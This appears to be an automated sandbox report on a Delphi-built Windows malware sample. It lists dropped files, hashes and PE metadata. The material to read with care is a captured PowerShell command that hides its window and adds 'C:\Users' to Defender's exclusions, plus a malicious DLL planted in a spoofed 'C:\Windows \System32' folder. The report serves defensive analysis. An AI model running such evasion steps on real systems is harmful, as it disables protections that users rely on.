                                                                        SHA-256:C85914BE1F3036E166FC6637EEE825AE4643C450538CEB3A3BCA4684096A3C93
                                                                        SHA-512:8BC937863FDD6FFC4160A8878065CEF6F7B7EBAB574E649BE43056712609B96C3A87E9C1C119BD1E1990B4DD72A25059296B441479700A76FB0997DDE658291D
                                                                        Malicious:false
                                                                        IE Cache URL:https://xhtfga.dm.files.1drv.com/y4mLM7I0znqqPndam59hy6bn9tPJOtRUAdenwP3svRarYt5LnLXiyxI3GRfAdIVWvGEdP7WvwhBY7JBsyH29vKnblrhK-rsbZvfR35i4oVfWbOJtfGvLBFmvJ5WvisBZ0Kk6aB0HngHCTbgLd5zRztJTzzOb0ebWgTwYJsz3wEjvoD0xmXbvprKomPc6ZB1AivMGTYtQ3gfP4I6-6gNnIsy0w/Citvonvhciktufwvyzyhistnewdjgso?download&psid=1
                                                                        Preview: .cecccgc.c..cc.ccccccc.c}cccccccccccccccccccccccccccccccccc.cc.scq...j....j...................................m..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc..cc..ic....ccccccccCc.>..e.c..ccu.cccccS..ccsccc.ccc.ccsccceccgcccccccgcccccccc.iccgccccccec.cccccccccccsccsccccccsccccccccccccS.c..ccc.gc..ecccccccccccccccccccgc..cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc...cccc3..ccsccc..ccgcccccccccccccc.cc...ccccs.ecc.cc.ecc.ccccccccccccc.cc#...cccccr.cccC.cccccc%.cccccccccccccccc#......cc..cccS.ccqccc%.ccccccccccccc.cc#......cc..ccccgcc.ccc3.ccccccccccccc.cc......ccc..ecc.gcc.eccO.ccccccccccccc.cc.ccccccccccccc.gcccccccgccccccccccccc.cc.cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):1292
                                                                        Entropy (8bit):5.3514758982995145
                                                                        Encrypted:false
                                                                        SSDEEP:24:3vQPpQrLAo4KAxq42qs5qRPsCvKMOoVZe9tCKnKJRSF8PQ9rqen:oPerB4U/q8qRUCvNvfe9tC4aR48Y9Oe
                                                                        MD5:CFB3DA6DC9232314BC42E4E6E0E39985
                                                                        SHA1:1DEEACC4CD17ADA2C5B37B6468B4C6089F89D66F
                                                                        SHA-256:8E899DB87FCC9BD5B0FCBD380FD0B1251B1BBAA8754B4766F58EC539B06E25E7
                                                                        SHA-512:4C799F63DA512C75B639B61C396AC27EC39561D9FE61C4519CBF2AB42C19563C9FE0C61280216B21897156F14A8535D7A6ABB29A20D773269FAD894D6EE72622
                                                                        Malicious:false
                                                                        Preview: @...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.Automation<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServicesL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................):gK..G...$.1.q........System.Configuration4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.P................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3d0dqmo2.y55.psm1
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview: 1
                                                                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_effl5svh.hnm.ps1
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:very short file (no magic)
                                                                        Category:dropped
                                                                        Size (bytes):1
                                                                        Entropy (8bit):0.0
                                                                        Encrypted:false
                                                                        SSDEEP:3:U:U
                                                                        MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                        Malicious:false
                                                                        Preview: 1
                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QMQWYHM887V4RPK1MFDO.temp
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):6205
                                                                        Entropy (8bit):3.7727429090688682
                                                                        Encrypted:false
                                                                        SSDEEP:96:kqP9mwcDf60CO+S/qRkvhkvCCtRTjHKTjHA:VP9mw6UPNRqg
                                                                        MD5:B6105AB09B5AE526B43F91489DBF54C6
                                                                        SHA1:8B520F760BE3D1A7EA41C22AABACA74DE1EEF1E3
                                                                        SHA-256:587A5DB6417967E12F30DA2AC97EFE6C74FBB6E81C30DBCDE9178A3A7D590F83
                                                                        SHA-512:D8CA844F6131977AA7795E733C0DCF5DFC4381C4040576203039A34935574FE679DEF8046AEBE080C323F1781C31E967E88CB62F5EEC18549279DECEA26D2359
                                                                        Malicious:false
                                                                        Preview: ...................................FL..................F.".. ....J...-...rt^.`..\.................................:..DG..Yr?.D..U..k0.&...&...........-..DU.U....HL...F......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N...R.#.....Y....................yN|.A.p.p.D.a.t.a...B.V.1......N....Roaming.@.......N...R.#.....Y.....................K..R.o.a.m.i.n.g.....\.1.....>Q.;..MICROS~1..D.......N...R.#.....Y.....................sJ.M.i.c.r.o.s.o.f.t.....V.1.....>Q}<..Windows.@.......N..>Q}<.....Y........................W.i.n.d.o.w.s.......1......N....STARTM~1..n.......N..>Q.;.....Y..............D.....6...S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.S..Programs..j.......N..>Q.;.....Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......N..>QZ7.....Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......N...P3Q.....Y..........
                                                                        C:\Users\user\Documents\20210512\PowerShell_transcript.124406.e+5goyTn.20210512063021.txt
                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4575
                                                                        Entropy (8bit):5.397462741017283
                                                                        Encrypted:false
                                                                        SSDEEP:96:BZpjFNzKqDo1ZKZijFNzKqDo1Z06oGZsjFNzKqDo1ZZfiKZ6:M
                                                                        MD5:2D23D4BA2AB09415726DDCB9ACE028A6
                                                                        SHA1:9BD3145B462996389FC79114DBAC40B11568AD9E
                                                                        SHA-256:9255940A1212CC4D47F26923ADB370BD74AE86B83229894EB86EA0D49865D3FA
                                                                        SHA-512:EFA68E3449567351EFE771C3EF49E1096C126DD3610B4B6372E247825A04DCA7DB210DD8A42A22F745BF4CCBA276351F0EBD496C52DCF3265446A4CFBD480FF8
                                                                        Malicious:false
                                                                        Preview: .**********************..Windows PowerShell transcript start..Start time: 20210512063021..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 124406 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users'..Process ID: 6920..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210512063021..**********************..PS>Add-MpPreference -ExclusionPath 'C:\Users'..**********************..Windows PowerShell transcript start..Start time: 20210512063516..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 1
                                                                        C:\Windows \System32\NETUTILS.dll
                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):111917
                                                                        Entropy (8bit):5.03897475395042
                                                                        Encrypted:false
                                                                        SSDEEP:1536:noJ4LH1bID3TdytQXt1amsk6B1w5jZcrjjAoeCl7MbiRtRDe2b:oKH1U/b1a5B1McrjjAo1RDe2b
                                                                        MD5:39507D772C63CA496A25A14A8B5D14B2
                                                                        SHA1:5B603F5C11EB9AB4313694315B4D4894FF4641D4
                                                                        SHA-256:36D1FA474CD8271F9B74B9481025614B6FF309F767F69D9F1FF3960C7205AD12
                                                                        SHA-512:0C740FD7B6D67D9938B0D8E1EA7D6C41910DD6D0B85B4EC8B6015FF8C0C73798DEE01F01DA0B5B0C07038663ACA7945FACA0E2B5AFC1CB751AABA7567D332F5F
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: Metadefender, Detection: 5%
                                                                        • Antivirus: ReversingLabs, Detection: 21%
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....a`.R..v.....& ..........................<a............................. ............... .................................................P............P..................\........................... ...(.......................X............................text...@........................... .P`.data...P....0......."..............@.P..rdata.......@.......$..............@.P@.pdata.......P.......*..............@.0@.xdata.......`......................@.0@.bss.........p........................p..edata...............0..............@.0@.idata..P............2..............@.0..CRT....X............:..............@.@..tls....h............<..............@.`..reloc..\............>..............@.0B/4...................@..............@.PB/19..................D..............@..B/31.....%...........................@..B/45.....q...........................@..B/57.....
                                                                        C:\Windows \System32\Netplwiz.exe
                                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                                        File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):40448
                                                                        Entropy (8bit):5.6272204024236245
                                                                        Encrypted:false
                                                                        SSDEEP:768:qt4lgFHE9Lm2kEwBrIit865IKX+1XycvydfUrh6WeENiJDBPrxZt4A:SmUFBIiGYIk+1RvyweWSDBPrxZaA
                                                                        MD5:F94B7FB6DAC49844D03C7087B2D8B472
                                                                        SHA1:0E84139FCED0EE8EF929D0BD5F01559A7DCF1DB0
                                                                        SHA-256:46E31F337ED0D9A6FE3F159ABC91C9B9B6A6062982BBCD84A51784D7128E7AE4
                                                                        SHA-512:D63878F94F7699E4CC63C2CD885C29455E0C423D32DBA750E4FC3AA74DBACA80A1A4B176719213B9FC6584DE6A40CDDFF7864C7FB4CFBA13DFCB437A36E41B80
                                                                        Malicious:true
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................P......P......P......P..........@...P......P.|.....P......Rich............PE..d................"......2...n.......8.........@....................................G4....`.......... .......................................\...........F......................4....W..T............................P...............Q...............................text....0.......2.................. ..`.rdata.......P.......6..............@..@.data........p.......N..............@....pdata...............P..............@..@.rsrc....F.......H...T..............@..@.reloc..4...........................@..B........................................................................................................................................................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):6.799965627764192
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 99.24%
                                                                        • InstallShield setup (43055/19) 0.43%
                                                                        • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                        • Windows Screen Saver (13104/52) 0.13%
                                                                        • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                        File name:Citvonvhciktufwvyzyhistnewdjgsoqdr.exe
                                                                        File size:721408
                                                                        MD5:4e71f90d1817f44313f4e101ef393968
                                                                        SHA1:3932f9822134761e7bf9bc1902f8cc28b6820559
                                                                        SHA256:aace20e28e61cb328da74ff938231b1ce9a07498d477efe3efc5c5d3d04b9dc1
                                                                        SHA512:a50c0e27009521b2f34358fb3bc30afb661b75cb6ba715ac8be15f412b50600dc3a474bd90de74c1e1b3941f3bc0d80c7b7e16aa26969a4250ec7f4dcd234419
                                                                        SSDEEP:12288:hrnWDrl98a7LUacm7sbiD97T5QM4Pr4rvU/Oy/6:hrWnZnUivR71B48rvUD/6
                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                        File Icon

                                                                        Icon Hash:b464c4d0f0e8dce0

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x470bb8
                                                                        Entrypoint Section:CODE
                                                                        Digitally signed:true
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:6b3ae8f7a807e67f6fac520b10e5dbe8

                                                                        Authenticode Signature

                                                                        Signature Valid:false
                                                                        Signature Issuer:CN=aaaaaaaaaaaaaaD
                                                                        Signature Validation Error:The digital signature of the object did not verify
                                                                        Error Number:-2146869232
                                                                        Not Before, Not After
                                                                        • 5/9/2021 10:18:49 PM 1/1/2040 12:59:59 AM
                                                                        Subject Chain
                                                                        • CN=aaaaaaaaaaaaaaD
                                                                        Version:3
                                                                        Thumbprint MD5:88DC567BBC512066E2853AA243DB487C
                                                                        Thumbprint SHA-1:587D5E176449F0353693C0BFC3F23ED2DA19EFD6
                                                                        Thumbprint SHA-256:AC56BB3F62BA8ECE00A2A667607C63DFE65689591205E9DEC229B407D579043A
                                                                        Serial:836D07F00609819F4959F48B45D1A746

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        add esp, FFFFFFF0h
                                                                        mov eax, 00470970h
                                                                        call 00007F56F0D49065h
                                                                        nop
                                                                        nop
                                                                        nop
                                                                        nop
                                                                        mov eax, dword ptr [00472A08h]
                                                                        mov eax, dword ptr [eax]
                                                                        call 00007F56F0D96DF5h
                                                                        mov ecx, dword ptr [0047294Ch]
                                                                        mov eax, dword ptr [00472A08h]
                                                                        mov eax, dword ptr [eax]
                                                                        mov edx, dword ptr [00470244h]
                                                                        call 00007F56F0D96DF5h
                                                                        mov eax, dword ptr [00472A08h]
                                                                        mov eax, dword ptr [eax]
                                                                        mov byte ptr [eax+5Bh], 00000000h
                                                                        mov eax, dword ptr [00472A08h]
                                                                        mov eax, dword ptr [eax]
                                                                        call 00007F56F0D96E5Eh
                                                                        call 00007F56F0D46C71h

                                                                        Data Directories

                                                                        Name                                  Virtual Address  Virtual Size  Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT          0x74000          0x273c        .idata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE        0x80000          0x3475e       .rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY        0xafe00          0x400         .rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC       0x79000          0x6cfc        .reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS             0x78000          0x18          .rdata
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                        Sections

                                                                        Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                                                        CODE    0x1000           0x6fc0c       0x6fe00   False     0.530143592877   data       6.58026450368   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        DATA    0x71000          0x1bac        0x1c00    False     0.456612723214   data       4.66718680142   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        BSS     0x73000          0xe0d         0x0       False     0                empty      0.0             IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .idata  0x74000          0x273c        0x2800    False     0.36455078125    data       4.88093111103   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .tls    0x77000          0x10          0x0       False     0                empty      0.0             IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .rdata  0x78000          0x18          0x200     False     0.048828125      data       0.195201267787  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .reloc  0x79000          0x6cfc        0x6e00    False     0.626526988636   data       6.68175411026   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .rsrc   0x80000          0x3475e       0x34800   False     0.380640811012   data       6.02117964138   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        Name             RVA      Size     Type  (Language, Country)
                                                                        RT_CURSOR        0x807b4  0x134    data
                                                                        RT_BITMAP        0x808e8  0xe8     GLS_BINARY_LSB_FIRST  (English, United States)
                                                                        RT_ICON          0x809d0  0x988    data  (English, United States)
                                                                        RT_ICON          0x81358  0x10a8   data  (English, United States)
                                                                        RT_MENU          0x82400  0x20     data  (English, United States)
                                                                        RT_DIALOG        0x82420  0x52     data
                                                                        RT_STRING        0x82474  0x260    data
                                                                        RT_STRING        0x826d4  0x1d8    data
                                                                        RT_STRING        0x828ac  0x198    data
                                                                        RT_STRING        0x82a44  0x174    data
                                                                        RT_STRING        0x82bb8  0x308    data
                                                                        RT_STRING        0x82ec0  0xd8     data
                                                                        RT_STRING        0x82f98  0x118    data
                                                                        RT_STRING        0x830b0  0x268    data
                                                                        RT_STRING        0x83318  0x3f8    data
                                                                        RT_STRING        0x83710  0x360    data
                                                                        RT_STRING        0x83a70  0x440    data
                                                                        RT_STRING        0x83eb0  0x1b0    data
                                                                        RT_STRING        0x84060  0xec     data
                                                                        RT_STRING        0x8414c  0x1e4    data
                                                                        RT_STRING        0x84330  0x3f4    data
                                                                        RT_STRING        0x84724  0x334    data
                                                                        RT_STRING        0x84a58  0x2b4    data
                                                                        RT_RCDATA        0x84d0c  0x10     data
                                                                        RT_RCDATA        0x84d1c  0x1d96   JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 180x300, frames 3  (Greek, Greece)
                                                                        RT_RCDATA        0x86ab4  0x2f8    data
                                                                        RT_RCDATA        0x86dac  0xf25    JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 52x52, frames 3  (Greek, Greece)
                                                                        RT_RCDATA        0x87cd4  0x2a5    Delphi compiled form 'T__2520219415'
                                                                        RT_RCDATA        0x87f7c  0x136    Delphi compiled form 'T__2520287816'
                                                                        RT_RCDATA        0x880b4  0x2c672  PC bitmap, Windows 3.x format, 225 x 225 x 4  (English, United States)
                                                                        RT_GROUP_CURSOR  0xb4728  0x14     Lotus unknown worksheet or configuration, revision 0x1
                                                                        RT_GROUP_ICON    0xb473c  0x22     data  (English, United States)

                                                                        Imports

                                                                        DLL           Import
                                                                        kernel32.dll  DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                        user32.dll    GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
                                                                        advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                        oleaut32.dll  SysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                        kernel32.dll  TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                        advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                        kernel32.dll  lstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, FindFirstFileA, FindClose, FileTimeToLocalFileTime, FileTimeToDosDateTime, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                                                        version.dll   VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                                                        gdi32.dll     UnrealizeObject, SwapBuffers, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixelFormat, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, ChoosePixelFormat, BitBlt
                                                                        opengl32.dll  wglMakeCurrent, wglGetCurrentDC, wglDeleteContext, wglCreateContext
                                                                        user32.dll    CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                        kernel32.dll  Sleep
                                                                        oleaut32.dll  SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                                                        ole32.dll     CoUninitialize, CoInitialize
                                                                        oleaut32.dll  GetErrorInfo, SysFreeString
                                                                        comctl32.dll  ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
                                                                        opengl32.dll  glViewport, glVertex3f, glTranslatef, glTexParameteri, glTexGeni, glTexEnvi, glStencilOp, glStencilFunc, glScalef, glRotatef, glRenderMode, glPushMatrix, glPushAttrib, glPopMatrix, glPopAttrib, glPolygonMode, glPassThrough, glNewList, glMultMatrixf, glMatrixMode, glMaterialfv, glLoadIdentity, glListBase, glLightModelf, glIsList, glIsEnabled, glHint, glGetLightfv, glGetIntegerv, glGetFloatv, glGetDoublev, glGenLists, glFeedbackBuffer, glEndList, glEnd, glEnable, glDisable, glDepthMask, glDepthFunc, glDeleteLists, glColorMask, glClearColor, glClear, glCallLists, glCallList, glBlendFunc, glBegin, glAccum
                                                                        glu32.dll     gluProject, gluPerspective
                                                                        opengl32.dll  glDeleteTextures, glBindTexture, glDrawElements, glInterleavedArrays

                                                                        Possible Origin

